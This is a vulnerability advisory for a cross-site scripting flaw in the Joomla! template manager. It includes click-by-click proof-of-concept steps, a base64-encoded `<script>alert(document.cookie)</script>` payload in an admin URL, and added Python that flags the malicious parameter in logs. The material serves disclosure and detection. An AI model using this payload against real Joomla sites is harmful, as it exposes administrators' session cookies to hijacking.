Overview
An issue was discovered in Joomla! 3.2.0 through 3.9.24: missing input validation within the template manager.
Details
The com_templates component in the Joomla administrator backend does not properly sanitize query parameters that are encoded in base64, resulting in a cross-site scripting (XSS) vulnerability. With a valid request token in hand, an attacker can lure an administrator into clicking a URL that carries a malicious base64-encoded string, which executes arbitrary JavaScript in the administrator's browser.
PoC Details
Encode the following payload to base64: `/v/  <script>alert(document.cookie)</script>`. This should produce the string `L3YvICA8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4=`.
1. Log in to Joomla as administrator.
2. On the toolbar at the top of the page, click 'Extensions', then 'Templates', then click 'Templates'.
3. On the new page, click 'Protostar Details and Files'.
4. Go to the 'Create Overrides' tab.
5. Under 'Layouts', click the 'joomla' folder, then right-click the 'content' link and copy the link.
6. Paste the copied link into the URL bar and replace the value of the 'folder' request parameter with the base64 string generated earlier.
7. Press Enter and observe the payload being executed.
PoC Code
// encode this:
/v/  <script>alert(document.cookie)</script>
// encoded base64 string. Insert it as the value of the folder query parameter:
L3YvICA8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4=
// base64 string inserted into the folder query parameter value:
http://localhost/joomla/administrator/index.php?option=com_templates&view=template&task=template.overrides&folder=L3YvICA8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4=&id=506&file=aG9tZQ&1f2655e0bd4aa0b883d373f33a65c058=1
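As an added example (not code from the advisory or from Joomla), the following Python checks the `folder` and `file` parameters the advisory describes: it decodes a base64 value with optional padding, accepts it only if it names a plain relative override path, and flags request URLs whose decoded value fails that test, so it can be run over web-server logs to spot attempts. The allow-list pattern, `encode_folder`, `decode_folder_param`, `suspicious_params`, `scan` and the sample URLs are all assumptions constructed for this example.

```python
import base64
import re
from urllib.parse import parse_qs, urlsplit

# Allow-list for a decoded override path: one or more segments of safe
# characters joined by single slashes. This rejects a leading '/', '..',
# whitespace and any HTML metacharacters (hypothetical policy, not Joomla's).
SAFE_PATH = re.compile(r"[A-Za-z0-9_-]+(?:/[A-Za-z0-9_-]+)*")

# Query parameters that com_templates decodes from base64 (per the advisory URL).
B64_PARAMS = ("folder", "file")

def encode_folder(path: str) -> str:
    """Standard base64 with '=' padding stripped, matching the unpadded
    file=aG9tZQ value seen in the advisory's URL."""
    return base64.b64encode(path.encode("utf-8")).decode("ascii").rstrip("=")

def decode_folder_param(value: str):
    """Decode a base64 path parameter and return the path only if it passes
    SAFE_PATH; return None for malformed base64, non-UTF-8 or unsafe paths."""
    padded = value + "=" * (-len(value) % 4)   # padding is optional on input
    try:
        decoded = base64.b64decode(padded, validate=True).decode("utf-8")
    except ValueError:   # binascii.Error and UnicodeDecodeError are ValueErrors
        return None
    return decoded if SAFE_PATH.fullmatch(decoded) else None

def suspicious_params(url: str) -> dict:
    """Return {name: raw_value} for base64 path parameters in a request URL
    whose decoded value fails validation (a detection check for logs or a WAF)."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {name: raw for name in B64_PARAMS
            for raw in query.get(name, []) if decode_folder_param(raw) is None}

# Constructed sample requests: a legitimate override link for joomla/content
# with file home, and the advisory's URL carrying the malicious folder value.
SAMPLE_REQUESTS = [
    "http://localhost/joomla/administrator/index.php?option=com_templates"
    "&view=template&task=template.overrides&folder=am9vbWxhL2NvbnRlbnQ"
    "&id=506&file=aG9tZQ",
    "http://localhost/joomla/administrator/index.php?option=com_templates"
    "&view=template&task=template.overrides&folder="
    "L3YvICA8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4=&id=506&file=aG9tZQ",
]

def scan(urls):
    """Return (url, bad_params) for every request carrying an unsafe value."""
    return [(u, bad) for u in urls if (bad := suspicious_params(u))]
```

Validating the decoded path is only the input-side check; the template manager still has to HTML-escape the value wherever it is echoed into the page.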
Affected Environments
Joomla! 3.2.0 through 3.9.24
Prevention
Upgrade to Joomla! version 3.9.25.